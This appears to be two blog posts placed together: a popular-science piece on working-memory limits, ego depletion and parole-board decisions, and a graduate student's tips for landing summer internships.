When we buy a new computer, its hardware capabilities are stated on the box or in the manual. Using sophisticated experiments, cognitive psychologists are trying to reverse-engineer the hardware limitations of our brains, and understand what might be the consequences of over-loading it. In terms of working memory, the magical number of objects that the average human being can store is thought to be seven, plus or minus two.  Psychologists ‘load’ the brains of subjects by incentivizing them (with real money) to memorize a varying number of digits; the consequences of this mental burden on our working memory are quite surprising. In a famous 1999 experiment, a group of Stanford researchers asked college undergrads to memorize a few digits, and then walk over to the room across the hall to recall them. On the way, they encountered a food cart, where they could choose between a chocolate cake and a healthier alternative – a fruit salad. Subjects that were asked to memorize seven digits were ~50% more likely to choose the unhealthy (but tasty) cake than subjects who were asked to memorize only two digits. Similar experiments in other domains, demonstrated that when the human CPU is loaded, people tend to ‘lose control’ by making selfish choices, spending money on impulsive purchases and using sexist language.

Cognitive load ahead

CPU power requires energy, and so is the case for our mind, whose preferred fuel is the sugar glucose. Just like after physical efforts (such as moving an apartment), following extensive mental exertions (for example a long exam) we find ourselves desperately looking for sugar in order to refill our mental batteries. This is a dangerous combination for dieters, whose self-control capabilities are anyways degraded because of the mental effort. Psychologists know the process of losing self-control as a result of decreasing brain-CPU power as ‘ego depletion’.

A group of Israeli researchers examined how ego depletion might affect fatal judgments requiring extreme mental effort – decisions of prison parole boards. Turns out that the odds that a prisoner will be successfully paroled dramatically drops from almost 65% at the start of the day (after breakfast) to almost none when the board members’ sugar level plummets, before lunch. Upon returning from their break, with their mental batteries loaded, the odds that the judges will turn around their default ‘NO’ abruptly rise to 65%, and then decline again. Prisoner’s fate is dramatically influenced by the random time for which his hearing was scheduled.

How can we avoid the loss of self-control and our degrading judgment capabilities? Obviously, extending our working memory or adding another CPU core is not an option for our minds. Perhaps making sure that we eat well, sleep enough and take a short break to keep our stress levels low is a start. Understanding the limitation of our brains might help us in forgiving our friends and ourselves, for the occasional bad decisions we all make sometimes.

The Internship Hunt

Around this time of year many students look for summer internships. Some want work experience so they can land a better job after graduation. Others hope to advance their research or improve their academic qualifications. Everyone appreciates the extra cash.

I’m now in my third year as a theory PhD student. Last summer I interned at a financial company and this summer I will intern at a tech firm. Because I had worked in software a number of years before grad school, I was not looking for job experience. My motivation (besides the extra cash) was to get a taste of working on research projects in industry. Also I find that immersing myself in “real-world” problems from time to time adds breadth and perspective to my theory research.

Whatever your motivations for seeking an internship, here are some suggestions that I’ve found useful.

Start early. This is mostly common sense so I won’t belabor the point, but consider this: crunch time at the end of the semester is busy enough without having to prepare for tech interviews, crank out a programming exercise, or schedule on-site visits. What counts as early varies, so ask the places you’re interested in.

Use your network. As pointed out in Lora Oehlberg’s recent blog post, your personal network is the first place to look for job opportunities. My first internship in high school, my first job out of college, and my internship from last summer all came through personal connections. People you know who work at a company you’re interested in can help you through the process and even vouch for you. If you know people who’ve done an internship you’re thinking about, talk to them about what to expect.

Practice. I was nearly eliminated from consideration for my internship last summer because I wasn’t prepared for the first tech interview. A friend of mine in the entertainment software industry told me that whenever he goes on the job market, he expects to flub his first interview from lack of practice. I’m not suggesting you should plan to flub interviews; just know that doing well on a tech interview takes mental readiness.

How do you practice? This is where advice from your connections (see previous point) comes in handy, especially from fellow students who have gone through the process before. I’ve found that working through online programming contests or problems at Project Euler helps get me into game shape.

Be candid and upfront. It’s tempting to be cagey with potential employers about competing offers, availability for the summer, or other constraints. Don’t do this. Last spring I interviewed with two companies and got two offers. I was forthcoming about this during the process, so when I had to turn one company down, I was able to keep the door open for the future. That company offered me a position for this summer, and the recruiter specifically mentioned my candor as a factor.

Do you have ideas for successful internship hunting? Cool internship experiences you want to share? Let us know in the comments.